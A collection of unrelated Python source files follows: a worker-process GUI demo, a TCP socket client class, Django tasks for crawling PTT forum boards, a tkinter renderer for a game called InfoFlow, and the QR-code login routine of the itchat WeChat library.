# Here's a function that will be called when requested by the parent
# process. There's nothing special about it really. Its return
# value will be passed as a keyword argument _results to the
# function which was queued with do_after, if there was one.
def foo(self,*args,**kwargs):
self.logger.debug('working on foo!')
time.sleep(10)
return 'results!!!'
def bar(self,*args,**kwargs):
self.logger.debug('working on bar!')
time.sleep(10)
raise Exception('error!')
return 'results!!!'
def baz(self,zzz,*args,**kwargs):
self.logger.debug('working on baz: time is %s'%repr(time.time()))
time.sleep(0.5)
if kwargs['return_queue']:
return Queue()
return 'results%d!!!'%zzz
if __name__ == '__main__':
import sys
import logging.handlers
# Setup logging:
logger = logging.getLogger('BLACS')
handler = logging.handlers.RotatingFileHandler('BLACS.log', maxBytes=1024**2, backupCount=0)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s')
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
if sys.stdout.isatty():
terminalhandler = logging.StreamHandler(sys.stdout)
terminalhandler.setFormatter(formatter)
terminalhandler.setLevel(logging.INFO)
logger.addHandler(terminalhandler)
else:
sys.stdout = sys.stderr = open(os.devnull)
logger.setLevel(logging.DEBUG)
#labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
if __name__ == '__main__':
from labscript_utils.qtwidgets.dragdroptab import DragDropTabWidget
app = QApplication(sys.argv)
window = QWidget()
layout = QVBoxLayout(window)
notebook = DragDropTabWidget()
layout.addWidget(notebook)
class FakeConnection(object):
def __init__(self):
self.BLACS_connection = 'None'
class FakeConnectionTable(object):
def __init__(self):
pass
def find_by_name(self, device_name):
return FakeConnection()
connection_table = FakeConnectionTable()
tab1 = MyTab(notebook,settings = {'device_name': 'Example', 'connection_table':connection_table})
tab2 = MyTab(notebook,settings = {'device_name': 'Example2', 'connection_table':connection_table})
window.show()
#notebook.show()
def run():
app.exec_()
tab1.close_tab()
tab2.close_tab()
sys.exit(run())
# Run the demo!:
# gtk.gdk.threads_init()
# window = gtk.Window()
# notebook = gtk.Notebook()
# window.connect('destroy',lambda widget: gtk.main_quit())
# window.add(notebook)
# notebook.show()
# window.show()
# window.resize(800,600)
# with gtk.gdk.lock:
# gtk.main()
|
socket.py
|
# ============================================================================
# FILE: socket.py
# AUTHOR: Rafael Bodill <justRafi at gmail.com>
# License: MIT license
# ============================================================================
import socket
from threading import Thread
from queue import Queue
from time import time, sleep
class Socket(object):
def __init__(self, host, port, commands, context, timeout):
self.__enc = context.get('encoding', 'utf-8')
self.__eof = False
self.__outs = []
self.__timeout = timeout
self.__context = context
self.__sock = self.connect(host, port, self.__timeout)
self.__welcome = self.receive()
self.sendall(commands)
self.__queue_out = Queue()
self.__thread = Thread(target=self.enqueue_output)
self.__thread.start()
@property
def welcome(self):
return self.__welcome
def eof(self):
return self.__eof
def kill(self):
if self.__sock is not None:
self.__sock.close()
self.__sock = None
self.__queue_out = None
self.__thread.join(1.0)
self.__thread = None
def sendall(self, commands):
for command in commands:
self.__sock.sendall('{}\n'.format(command).encode(self.__enc))
def receive(self, bytes=1024):
return self.__sock.recv(bytes).decode(
self.__enc, errors='replace')
def connect(self, host, port, timeout):
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, socket.IPPROTO_TCP,
socket.AI_ADDRCONFIG):
family, socket_type, proto, canon_name, sa = res
sock = None
try:
sock = socket.socket(family, socket_type, proto)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
sock.settimeout(timeout)
sock.connect(sa)
return sock
except socket.error as e:
if sock is not None:
sock.close()
if e is not None:
raise e
else:
raise OSError('Socket: getaddrinfo returns an empty list')
def enqueue_output(self):
if not self.__queue_out:
return
buffer = self.receive(2048)
buffering = True
while buffering:
if '\n' in buffer:
(line, buffer) = buffer.split('\n', 1)
self.__queue_out.put(line)
else:
more = self.receive()
if not more:
buffering = False
else:
buffer += more
def communicate(self, timeout):
if not self.__sock:
return []
start = time()
outs = []
if self.__queue_out.empty():
sleep(0.1)
while not self.__queue_out.empty() and time() < start + timeout:
outs.append(self.__queue_out.get_nowait())
if self.__thread.is_alive() or not self.__queue_out.empty():
return outs
self.__eof = True
self.__sock = None
self.__thread = None
self.__queue = None
return outs
|
tasks.py
|
import threading
from django.db import transaction
from .models import CrawlTask, TaskStatus
from .PttSpider.ptt_spider import PttArticleListSpider, PttArticleSpider
from .PttSpider.ptt_spider import Push, ArticleInfo
from .PttSpider.ptt_spider import PttUrl, PttUrlType
from .taskpool import TaskPool
TASK_POOL_SIZE = 5
def set_task_status(task, status):
with transaction.atomic():
task.status = status
task.save(update_fields=['status', 'update_time'])
def put_task_error(task):
set_task_status(task, TaskStatus.ERROR)
raise
def board_handler(board_url):
spider = PttArticleListSpider(board_url, max_fetch=10)
spider.run()
url_list = spider.article_url_list
if len(url_list) == 0:
return []
article_list = []
for url in url_list:
try:
spider = PttArticleSpider(url)
spider.run()
article = spider.article
except Exception as e:
print(f"Get Exception {e}")
article = ArticleInfo()
finally:
article_list.append(spider.article)
return article_list
def get_parsing_handler(url):
url_type = PttUrl(url).type
if url_type != PttUrlType.BOARD:
return None
return board_handler
def c_task(tid, url):
try:
with transaction.atomic():
task = CrawlTask.objects.get(id=tid)
except CrawlTask.DoesNotExist as e:
print(f"Get task error {e}")
raise
set_task_status(task, TaskStatus.RUNNING)
handler = get_parsing_handler(url)
if handler is None:
put_task_error(task)
try:
article_list = handler(url)
except Exception as e:
put_task_error(task)
#create_posts(article_list)
set_task_status(task, TaskStatus.FINISH)
m = None
def crawler_init():
global m
def start_monitor():
def monitor():
m.run()
threading.Thread(target=monitor).start()
print("start monitoring")
if m is not None:
return
objs = CrawlTask.objects.exclude(status=TaskStatus.ERROR)
objs.update(status=TaskStatus.FINISH)
m = TaskPool(TASK_POOL_SIZE)
start_monitor()
def create_crawl_task(url):
with transaction.atomic():
task, _ = CrawlTask.objects.get_or_create(
url=url,
defaults={'name':url, 'url':url, 'status':TaskStatus.QUEUING},
)
try:
success = m.add(c_task, task.id, task.id, url)
if not success:
set_task_status(task, TaskStatus.ERROR)
except Exception as e:
success = False
print("add task fail")
return success
__all__ = ['crawler_init' , 'create_crawl_task']
|
InfoFlow_Array_VIS_For_TK.py
|
import show_state_array
from InfoFlow import *
import tkinter as tk
from tkinter import font
from tkinter import N, S, W, E
from typing import List
import random
import time
from threading import Thread
def rgb2hex(r, g, b):
return "#%02x%02x%02x" % (r, g, b)
class Style:
color_background = "#373737"
color_foreground = "#8E8E8E"
color_text = "#E4E4E4"
color_border = "#373737"
font_name_default = "Helvetica"
font_size_title = 24
font_size_normal = 16
border_default = "ridge"
loaded_fonts = {}
@staticmethod
def get_font(name: str, size: int, bold: bool = False, italic: bool = False, underline: bool = False, overstrike: bool = False, nocache=False) -> "font.Font":
key = (name, size, bold, italic, underline, overstrike)
if key in Style.loaded_fonts:
return Style.loaded_fonts[key]
f = font.Font(family=name, size=size, weight="bold" if bold else "normal", slant="italic" if italic else "roman", underline=str(underline).lower(), overstrike=str(overstrike).lower())
if not nocache:
Style.loaded_fonts[key] = f
return f
class StateDisplay(tk.Frame):
def __init__(self, parent, width, height):
super().__init__(parent)
self.root = parent
self.width = width
self.height = height
# What our UI looks like
# -------------------------------------
# | | Round | |
# | |--------------| |
# | | | |
# | player | Game | All |
# | stats | View | Operators |
# | | | |
# |-----------------------------------|
# | State Describe |
# -------------------------------------
self.style(self.root, bg=Style.color_background)
# Player Info
self.frame_player_info = tk.LabelFrame(self.root, text=" Player Stats ", borderwidth=2, relief=Style.border_default, font=Style.get_font("Chiller", Style.font_size_title, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.frame_player_info.grid(row=0, column=0, rowspan=2, columnspan=1, ipadx=4, ipady=4, padx=4, pady=4, sticky=N + S + W + E)
self.label_energy = tk.Label(self.frame_player_info, text="Energy: ", font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.label_energy.grid(row=0, column=0, sticky=W)
self.canvas_energy = self.style(tk.Canvas(self.frame_player_info, width=100, height=20, bg=Style.color_background),
hc=Style.color_border, ht=1)
self.canvas_energy.grid(row=0, column=1, sticky=W)
color_energy = rgb2hex(46, 204, 113)
self.rect_energy = self.canvas_energy.create_rectangle(0, 0, 100, 20, fill=color_energy, outline=color_energy)
# self.text_energy = self.canvas_energy.create_text(25, 10, text="100", font=Style.get_font("Helvetica", Style.font_size_normal, bold=True))
self.label_score = tk.Label(self.frame_player_info, text="Score: ", bg=Style.color_background, fg=Style.color_text,
font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True))
self.label_score.grid(row=1, column=0, sticky=W)
self.text_score = tk.Label(self.frame_player_info, font=Style.get_font(Style.font_name_default, Style.font_size_normal), bg=Style.color_background, fg=Style.color_text)
self.text_score.grid(row=1, column=1, sticky=W)
self.label_finished = tk.Label(self.frame_player_info, text="Finished Challenges: ", font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.label_finished.grid(row=2, column=0, sticky=W)
self.text_finished = tk.Label(self.frame_player_info, font=Style.get_font(Style.font_name_default, Style.font_size_normal), bg=Style.color_background, fg=Style.color_text)
self.text_finished.grid(row=2, column=1, sticky=W)
self.label_money = tk.Label(self.frame_player_info, text="Money/Debt: ", font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.label_money.grid(row=3, column=0, sticky=W)
self.text_money = tk.Label(self.frame_player_info, font=Style.get_font(Style.font_name_default, Style.font_size_normal), bg=Style.color_background, fg=Style.color_text)
self.text_money.grid(row=3, column=1, sticky=W)
self.label_difficulty_level = tk.Label(self.frame_player_info, text="Difficulty Level: ", font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.label_difficulty_level.grid(row=4, column=0, sticky=W)
self.text_difficulty_level = tk.Label(self.frame_player_info, font=Style.get_font(Style.font_name_default, Style.font_size_normal), bg=Style.color_background, fg=Style.color_text)
self.text_difficulty_level.grid(row=4, column=1, sticky=W)
self.label_accepted = tk.Label(self.frame_player_info, text="Has accepted challenge: ", font=Style.get_font(Style.font_name_default, Style.font_size_normal, bold=True),
bg=Style.color_background, fg=Style.color_text)
self.label_accepted.grid(row=5, column=0, sticky=W)
self.text_accepted = tk.Label(self.frame_player_info, font=Style.get_font(Style.font_name_default, Style.font_size_normal), bg=Style.color_background, fg=Style.color_text)
self.text_accepted.grid(row=5, column=1, sticky=W)
# Game Frame
self.label_round = tk.Label(self.root, text="\nRound Beginning", bg=Style.color_background, fg=Style.color_text, font=Style.get_font("Algerian", Style.font_size_normal))
self.label_round.grid(row=0, column=1, padx=4, pady=4, sticky=N + S + W + E)
self.frame_game = tk.LabelFrame(self.root, text=" Game View ", bg=Style.color_background, fg=Style.color_text,
relief=Style.border_default, font=Style.get_font("Chiller", Style.font_size_title, bold=True))
self.frame_game.grid(row=1, column=1, ipadx=2, ipady=2, padx=8, pady=12)
self.canvas_game = self.style(tk.Canvas(self.frame_game, width=600, height=400, bg=Style.color_background),
hc=Style.color_border, ht=0)
self.canvas_game.grid(row=0, column=0)
# Operators
self.frame_operators = self.style(tk.LabelFrame(self.root, text=" Operators ", borderwidth=2, relief=Style.border_default, font=Style.get_font("Chiller", Style.font_size_title, bold=True)),
bg=Style.color_background, fg=Style.color_text)
self.frame_operators.grid(row=0, column=2, rowspan=2, columnspan=1, ipadx=4, ipady=4, padx=4, pady=4, sticky=N + S + W + E)
self.list_operators = self.style(tk.Listbox(self.frame_operators, width=30, font=Style.get_font(Style.font_name_default, Style.font_size_normal),
bg=Style.color_background, fg=Style.color_text, borderwidth=0, selectmode=tk.SINGLE,
selectbackground=Style.color_foreground, selectforeground=Style.color_background),
hc=Style.color_border, ht=0)
self.list_operators.grid(row=0, column=0, padx=4, pady=4)
# Label for describing states
self.frame_state_describe = tk.LabelFrame(self.root, text=" Current State Description ", borderwidth=2, relief=Style.border_default,
font=Style.get_font("Chiller", Style.font_size_title, bold=True), bg=Style.color_background, fg=Style.color_text)
self.frame_state_describe.grid(row=2, column=0, columnspan=3, padx=4, pady=4, ipadx=4, ipady=4, sticky=N + S + W + E)
self.label_state_describe = tk.Label(self.frame_state_describe, font=Style.get_font("Consolas", Style.font_size_normal),
bg=Style.color_background, fg=Style.color_text, justify=tk.CENTER, anchor=N + W, wraplength=1400)
self.label_state_describe.pack(expand=True)
# set grid auto expand
self.grid_auto_expand(parent, 2, 2, row_weights=[0, 0, 1], col_weights=[0, 1, 0])
self.grid_auto_expand(self.frame_player_info, 6, 2, row_weights=[0 for _ in range(6)], col_weights=[0, 0])
@staticmethod
def style(w, hc=None, ht=None, **options):
w.configure(**options)
if hc and ht:
w.configure(highlightcolor=hc, highlightbackground=hc, highlightthickness=ht)
elif hc:
w.configure(highlightcolor=hc, highlightbackground=hc)
elif ht:
w.configure(highlightthickness=ht)
return w
@staticmethod
def set_text(w: 'tk.Text', text: str):
w.configure(state=tk.NORMAL)
w.delete(1.0, tk.END)
w.insert(tk.END, text)
w.configure(state=tk.DISABLED)
@staticmethod
def grid_auto_expand(frame: 'tk.Frame', row: int, col: int, row_weights: 'List[int]' = None, col_weights: 'List[int]' = None) -> None:
for i in range(row):
tk.Grid.rowconfigure(frame, i, weight=row_weights[i] if row_weights else 1)
for i in range(col):
tk.Grid.columnconfigure(frame, i, weight=col_weights[i] if col_weights else 1)
def initialize_tk(width, height, title):
root = tk.Tk()
root.title(title)
display = StateDisplay(root, width=width, height=height)
root.minsize(1100, 590)
show_state_array.STATE_WINDOW = display
print("VIS initialization finished")
class StateRenderer:
def init(self, display: 'StateDisplay', state: 'State'):
pass
def is_static_renderer(self):
return True
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
display.label_state_describe.configure(text=state.describe_state())
# Draw player stats
if state.player:
display.canvas_energy.coords(display.rect_energy, 0, 0, state.player.energy, 20)
# display.canvas_energy.itemconfigure(display.text_energy, text=f"{state.player.energy:3}", fill="white" if state.player.energy < 30 else "black")
display.text_score.configure(text=f"{state.player.score}")
display.text_finished.configure(text=f"{state.player.finished}")
display.text_money.configure(text=f"${state.player.money}/${state.player.debt}")
display.text_difficulty_level.configure(text=f"{state.player.difficulty_level}")
display.text_accepted.configure(text=f"{'✔' if state.player.has_accepted_challenge() else '×'}")
# Update round information
display.label_round.configure(text=f"\nRound {state.round}")
# Draw available operators
global OPERATORS
display.list_operators.delete(0, tk.END)
if OPERATORS:
ops = [(ind, op) for ind, op in enumerate(OPERATORS) if state.is_applicable_operator(op)]
for ind, op in ops:
display.list_operators.insert(tk.END, f"{ind:2}: {op.name}")
def dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
pass
def is_static_post_renderer(self):
return True
def post_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
pass
def post_dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State') -> bool:
# Return True if has more dynamic render; otherwise, return False
return False
@staticmethod
def get_renderer(state_type) -> 'StateRenderer':
if state_type in StateRenderer.all:
return StateRenderer.all[state_type]()
else:
raise TypeError(state_type)
class GameStartStateRenderer(StateRenderer):
class Rain:
def __init__(self, content: List[str], x: int, y: int, speed: float, size: int, color: str):
# self.text = "\n".join(content)
self.text = "".join(content)
self.x = x
self.y = y
self.speed = speed
self.size = size
self.color = color
def is_disappeared(self):
if self.speed > 0:
return self.x > 650
else:
return self.x < -300
@staticmethod
def random() -> 'GameStartStateRenderer.Rain':
x, speed = (random.randint(-800, -500), random.random() * 32 + 2) if random.randint(0, 1) is 0 else (600 + random.randint(500, 800), -(random.random() * 32 + 2))
return GameStartStateRenderer.Rain(content=random.choices(population=["0", "1", "0", "1", "0", "1", "0", "1"], k=random.randint(6, 18)),
# x=random.randint(-10, 590), y=random.randint(-500, -300), speed=random.random() * 32 + 2,
x=x, y=random.randint(-10, 390), speed=speed,
size=random.randint(4, 24), color=Style.color_text)
def init(self, display, state):
self.rect_outer = display.canvas_game.create_rectangle(180, 130, 420, 270, width=4, fill=Style.color_text, outline=Style.color_text)
self.rect_inner = display.canvas_game.create_rectangle(184, 134, 416, 266, width=2, fill=Style.color_text, outline=Style.color_background)
self.font_title = Style.get_font("Gill Sans MT", 40, True, nocache=True)
self.text_title = display.canvas_game.create_text(300, 200, text="Info Flow", fill=Style.color_background, font=self.font_title)
self.rains = [GameStartStateRenderer.Rain.random() for _ in range(40)]
self.text_rains = []
for r in self.rains:
self.text_rains.append(display.canvas_game.create_text(r.x, r.y, anchor=tk.NW, font=Style.get_font("Consolas", r.size), text=r.text, fill=r.color))
def is_static_renderer(self):
return False
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
def dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
rains, text_rains = self.rains[:], self.text_rains[:]
for i in range(len(rains)):
r, t = rains[i], text_rains[i]
r.x += r.speed
if display:
display.canvas_game.move(t, r.speed, 0)
if r.is_disappeared() and r in rains:
if display:
display.canvas_game.delete(t)
rains.remove(r)
text_rains.remove(t)
nr = GameStartStateRenderer.Rain.random()
rains.append(nr)
text_rains.append(display.canvas_game.create_text(nr.x, nr.y, anchor=tk.NW, font=Style.get_font("Consolas", nr.size), text=nr.text, fill=nr.color))
self.rains, self.text_rains = rains, text_rains
def is_static_post_renderer(self):
return False
def post_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
self.offset_outer = [0, 0, 0, 0]
self.offset_inner = [0, 0, 0, 0]
self.offset_size_title = 0
def post_dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
self.offset_outer = [i + 20 for i in self.offset_outer]
self.offset_inner = [i + 20 for i in self.offset_inner]
self.offset_size_title += 6
self.font_title.configure(size=28 + self.offset_size_title)
display.canvas_game.coords(self.rect_outer, 200 - self.offset_outer[0], 150 - self.offset_outer[1], 400 + self.offset_outer[2], 250 + self.offset_outer[3])
display.canvas_game.coords(self.rect_inner, 204 - self.offset_outer[0], 154 - self.offset_outer[1], 396 + self.offset_outer[2], 246 + self.offset_outer[3])
display.canvas_game.itemconfigure(self.text_title, font=self.font_title)
return False if self.offset_size_title >= 60 else True
class ChallengeMenuStateRenderer(StateRenderer):
def init(self, display, state):
self.c_menus = [[i * 100 + 50, 100 + 50 * i, random.randint(0, 50), random.randint(0, 10), .5, .5] for i in range(4)]
self.font = Style.get_font(Style.font_name_default, 28, italic=True)
self.label_accept = display.canvas_game.create_text(self.c_menus[0][0], self.c_menus[0][1], anchor=W,
text=OperatorIds.CHALLENGE_ACCEPT.value, fill=Style.color_text, font=self.font)
self.label_decline = display.canvas_game.create_text(self.c_menus[1][0], self.c_menus[1][1], anchor=W,
text=OperatorIds.CHALLENGE_DECLINE.value, fill=Style.color_text, font=self.font)
self.label_pay = display.canvas_game.create_text(self.c_menus[2][0], self.c_menus[2][1], anchor=W,
text=OperatorIds.PAY_DEBT.value, fill=Style.color_text, font=self.font)
self.label_finish_round = display.canvas_game.create_text(self.c_menus[3][0], self.c_menus[3][1], anchor=W,
text=OperatorIds.FINISH_ROUND.value, fill=Style.color_text, font=self.font)
def is_static_renderer(self):
return False
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
def dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
for t in self.c_menus:
x, y, off_x, off_y, s_x, s_y = t
t[0], t[1], t[2], t[3] = x + s_x, y + s_y, off_x + s_x, off_y + s_y
if t[2] <= 0 or t[2] >= 50:
t[4] = -t[4]
if t[3] <= 0 or t[3] >= 10:
t[5] = -t[5]
display.canvas_game.coords(self.label_accept, self.c_menus[0][0], self.c_menus[0][1])
display.canvas_game.coords(self.label_decline, self.c_menus[1][0], self.c_menus[1][1])
display.canvas_game.coords(self.label_pay, self.c_menus[2][0], self.c_menus[2][1])
display.canvas_game.coords(self.label_finish_round, self.c_menus[3][0], self.c_menus[3][1])
def is_static_post_renderer(self):
return False
def post_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
if last_state.selected_operator.id is OperatorIds.CHALLENGE_ACCEPT:
self.pos_select = self.c_menus[0]
self.text_select = self.label_accept
elif last_state.selected_operator.id is OperatorIds.CHALLENGE_DECLINE:
self.pos_select = self.c_menus[1]
self.text_select = self.label_decline
elif last_state.selected_operator.id is OperatorIds.PAY_DEBT:
self.pos_select = self.c_menus[2]
self.text_select = self.label_pay
elif last_state.selected_operator.id is OperatorIds.FINISH_ROUND:
self.pos_select = self.c_menus[3]
self.text_select = self.label_finish_round
self.size_select = 28
self.font_select = Style.get_font(Style.font_name_default, self.size_select, bold=True, italic=True, nocache=True)
def post_dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
if self.size_select < 44:
display.canvas_game.itemconfigure(self.text_select, font=self.font_select)
self.font_select.configure(size=self.size_select + 2)
self.size_select += 8
return True
elif self.pos_select[0] < 650:
display.canvas_game.coords(self.text_select, self.pos_select[0], self.pos_select[1])
self.pos_select[0] += 60
return True
else:
return False
class MessageDisplayStateRenderer(StateRenderer):
def init(self, display, state):
pass
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
if state.show_title:
# display.canvas_game.create_oval(70, 50, 100, 80, fill=Style.color_text, outline=Style.color_text)
# display.canvas_game.create_oval(72, 52, 98, 78, fill=Style.color_background, outline=Style.color_text)
# display.canvas_game.create_text(85, 65, text="i", fill=Style.color_text, font=Style.get_font("Impact", 18, bold=True))
display.canvas_game.create_text(45, 35, text=state.title, fill=Style.color_text, font=Style.get_font(Style.font_name_default, Style.font_size_title, bold=True),
anchor=tk.W, width=500)
display.canvas_game.create_text(50, 60, text=state.info, fill=Style.color_text,
font=Style.get_font(Style.font_name_default,
Style.font_size_normal if len(state.info.split(". ") + state.info.split("\n")) < 8 else Style.font_size_normal - 2),
anchor=tk.NW, width=500)
if not state.show_title:
display.canvas_game.create_text(50, 50, text=state.info, fill=Style.color_text,
font=Style.get_font(Style.font_name_default,
Style.font_size_normal if len(state.info.split(". ") + state.info.split("\n")) < 8 else Style.font_size_normal - 2),
anchor=tk.NW, width=500)
class NewsSortingChallengeStateRenderer(StateRenderer):
def init(self, display, state):
pass
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
display.canvas_game.create_text(300, 200, text=f"News: {state.player.current_challenge.to_sort[state.news_index]}", fill=Style.color_text,
font=Style.get_font(Style.font_name_default, 40), width=550)
class MythBusterChallengeStateRenderer(StateRenderer):
def init(self, display, state):
pass
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
display.canvas_game.create_text(300, 200, text=f"Statement: {state.player.current_challenge.myths[state.myth_index]}", fill=Style.color_text,
font=Style.get_font(Style.font_name_default, 40), width=550)
def is_static_post_renderer(self):
return False
def post_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
if last_state.selected_operator.id is MythBusterChallenge.provided_ops[0].id:
self.content_seal = "FACT"
elif last_state.selected_operator.id is MythBusterChallenge.provided_ops[1].id:
self.content_seal = "MYTH"
else:
self.content_seal = None
if self.content_seal:
self.rect_seal = display.canvas_game.create_oval(300, 200, 500, 280, fill="red", outline="red")
self.font_seal = Style.get_font("Arial", 40, True, nocache=True)
self.font_size = 40
self.text_seal = display.canvas_game.create_text(400, 240, text=self.content_seal, fill=Style.color_foreground, font=self.font_seal)
self.size_outline = 1
def post_dynamic_render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
if self.content_seal:
display.canvas_game.itemconfigure(self.rect_seal, width=self.size_outline)
self.size_outline += 1
self.font_size += 2
self.font_seal.configure(size=self.font_size)
return self.size_outline is not 10
else:
return False
class InstantMemChallengeStateRenderer(StateRenderer):
def init(self, display, state):
pass
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
if state.phase_index is 0:
display.canvas_game.create_text(300, 200, text=f"{state.describe_state()}", fill=Style.color_text,
font=Style.get_font(Style.font_name_default, 20), width=550)
elif state.phase_index is 1:
display.canvas_game.create_text(50, 50, text=f"{state.describe_state()}", fill=Style.color_text,
anchor=tk.NW,
font=Style.get_font(Style.font_name_default, 20), width=550)
class MinerChallengeStateRenderer(StateRenderer):
def init(self, display, state):
pass
def render(self, display: 'StateDisplay', state: 'State', last_state: 'State'):
super().render(display, state, last_state)
self.font_text = Style.get_font(Style.font_name_default, 12, bold=True)
padx = 25
pady = 25
x0 = 0
y0 = 25
map_size = state.player.current_challenge.map_size
self.cell_width = (600 - padx * 2) / map_size
self.cell_height = (400 - pady * 2) / map_size
display.canvas_game.create_text(300, 10, text="Get to the destination, try to get useful information as much as you can, and avoid trash information!",
font=self.font_text, fill=Style.color_text, width=550, anchor=N, justify=tk.CENTER)
for y in range(map_size):
for x in range(map_size):
c = state.player.current_challenge.map[y][x]
color = None if c is 0 else "#AA0000" if c is 1 else "green" if c is 2 else "blue" if c is 4 else "brown" if c is 5 else "black"
text = "" if c is 0 else "Trash" if c is 1 else "Info" if c is 2 else "Player" if c is 4 else "Goal" if c is 5 else ""
display.canvas_game.create_rectangle(x0 + padx + x * self.cell_width, y0 + pady + y * self.cell_height,
x0 + padx + (x + 1) * self.cell_width, y0 + pady + (y + 1) * self.cell_height,
fill=color, outline=Style.color_foreground)
display.canvas_game.create_text(x0 + padx + (x + 0.5) * self.cell_width, y0 + pady + (y + 0.5) * self.cell_height,
fill=Style.color_text, text=text, font=self.font_text)
self.cell_player = display.canvas_game.create_rectangle(x0 + padx + state.player.current_challenge.x * self.cell_width,
y0 + pady + state.player.current_challenge.y * self.cell_height,
x0 + padx + (state.player.current_challenge.x + 1) * self.cell_width,
y0 + pady + (state.player.current_challenge.y + 1) * self.cell_height,
fill="blue", outline=Style.color_foreground)
StateRenderer.all = {
GameStartState: lambda: GameStartStateRenderer(),
ChallengeMenuState: lambda: ChallengeMenuStateRenderer(),
MessageDisplayState: lambda: MessageDisplayStateRenderer(),
NewsSortingChallengeState: lambda: NewsSortingChallengeStateRenderer(),
MythBusterChallengeState: lambda: MythBusterChallengeStateRenderer(),
InstantMemChallengeState: lambda: InstantMemChallengeStateRenderer(),
MinerChallengeState: lambda: MinerChallengeStateRenderer()
}
def initialize_vis():
initialize_tk(width=1200, height=800, title="InfoFlow")
StateRenderer.last_state: 'State' = None
keep_render: bool = False
renderer: 'StateRenderer' = None
in_render_state = False
def render_state(state: 'State'):
# print("In render_state, state is " + str(state)) # DEBUG ONLY
global in_render_state
while in_render_state:
time.sleep(0.1)
in_render_state = True
global keep_render, renderer
keep_render = False
if StateRenderer.last_state and StateRenderer.last_state.selected_operator and renderer:
if show_state_array.STATE_WINDOW:
renderer.post_render(show_state_array.STATE_WINDOW, state, StateRenderer.last_state)
if not renderer.is_static_post_renderer():
keep_post_render = True
while show_state_array.STATE_WINDOW and keep_post_render:
keep_post_render = renderer.post_dynamic_render(show_state_array.STATE_WINDOW, state, StateRenderer.last_state)
show_state_array.STATE_WINDOW.root.update()
time.sleep(.05)
state.selected_operator = None
show_state_array.STATE_WINDOW.canvas_game.delete(tk.ALL)
def render():
global in_render_state, renderer
renderer = StateRenderer.get_renderer(type(state))
renderer.init(show_state_array.STATE_WINDOW, state)
in_render_state = False
if show_state_array.STATE_WINDOW:
renderer.render(show_state_array.STATE_WINDOW, state, StateRenderer.last_state)
if not renderer.is_static_renderer():
while show_state_array.STATE_WINDOW and keep_render:
renderer.dynamic_render(show_state_array.STATE_WINDOW, state, StateRenderer.last_state)
time.sleep(.05)
keep_render = True
t = Thread(target=lambda: render())
t.setDaemon(True)
t.start()
# StateRenderer.get_renderer(type(state)).render(show_state_array.STATE_WINDOW, state, StateRenderer.last_state)
StateRenderer.last_state = state
|
login.py
|
import os, sys, time, re, io
import threading
import json, xml.dom.minidom
import copy, pickle, random
import traceback, logging
try:
from httplib import BadStatusLine
except ImportError:
from http.client import BadStatusLine
import requests
from pyqrcode import QRCode
from .. import config, utils
from ..returnvalues import ReturnValue
from ..storage.templates import wrap_user_dict
from .contact import update_local_chatrooms, update_local_friends
from .messages import produce_msg
logger = logging.getLogger('itchat')
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
def login(self, enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if self.alive or self.isLogging:
logger.warning('itchat has already logged in.')
return
self.isLogging = True
while self.isLogging:
uuid = push_login(self)
if uuid:
qrStorage = io.BytesIO()
else:
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid():
time.sleep(1)
logger.info('Downloading QR code.')
qrStorage = self.get_QR(enableCmdQR=enableCmdQR,
picDir=picDir, qrCallback=qrCallback)
logger.info('Please scan the QR code to log in.')
isLoggedIn = False
while not isLoggedIn:
status = self.check_login()
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue())
if status == '200':
isLoggedIn = True
elif status == '201':
if isLoggedIn is not None:
logger.info('Please press confirm on your phone.')
isLoggedIn = None
elif status != '408':
break
if isLoggedIn:
break
elif self.isLogging:
logger.info('Log in time out, reloading QR code.')
else:
return # log in process is stopped by user
logger.info('Loading the contact, this may take a little while.')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
if os.path.exists(picDir or config.DEFAULT_QR):
os.remove(picDir or config.DEFAULT_QR)
logger.info('Login successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
